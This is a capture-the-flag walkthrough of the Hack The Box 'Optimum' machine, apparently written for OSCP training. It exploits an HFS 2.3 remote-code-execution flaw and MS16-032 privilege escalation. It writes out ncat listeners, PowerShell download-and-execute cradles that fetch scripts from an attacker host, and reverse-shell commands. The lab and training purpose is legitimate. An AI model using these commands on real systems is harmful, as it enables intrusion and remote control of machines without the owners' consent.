Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.
In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.
Let's start with the fun!
Optimum
Initial Foothold
There is an HTTP File Server
(HFS) version 2.3
on port 80.
Doing searchsploit HFS
we find one with RCE for version 2.3.x
.
User
- Mirror the exploit:
searchsploit -m 39161.py
. - Rename it:
mv 39161.py hts.py
. - Start the listener:
ncat -lnvp 12345
. - Modify the exploit to match our local IP address and the port
12345
. - Download
nc
for windows:wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip
. unzip netcat-win32-1.11.zip
the the file andcd
into it.- (IMPORTANT) Replace
nc.exe
with the 64 bits binary:rm nc.exe
andmv nc64.exe nc.exe
. - Start and http server on port 80:
python3 -m http.server 80
- Run the exploit twice:
python3 10.10.10.8 80
. - Our
ncat
listener should have caught a shell.
Root
Upgrade to powershell
shell, refer to the CMD
cheatsheet. From there, we can download
Sherlock.ps1
to quickly test for different CVEs. While Watson
is better, it only supports
Windows Server 2016 and 2019.
It looks like its vulnerable to MS16-032
.
If we use the one from exploit-db
, it says it works but it does not spawn a shell. Apparently it
tries to spawn a graphical terminal, so it does not work for us.
There is modified version of the script on powershell-empire
. Add the following line at the end:
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.31:8000/shell.ps1')"
shell.ps1
also comes from powershell-empire
which is: /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
.
Append this line to end:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 6969
Set up a python http server: python3 -m http.server
. (The default port is port 8000).
Set up a listener: ncat -lnvp 6969
.
Finally, on the victim run: IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31:8000/Invoke-MS16032.ps1')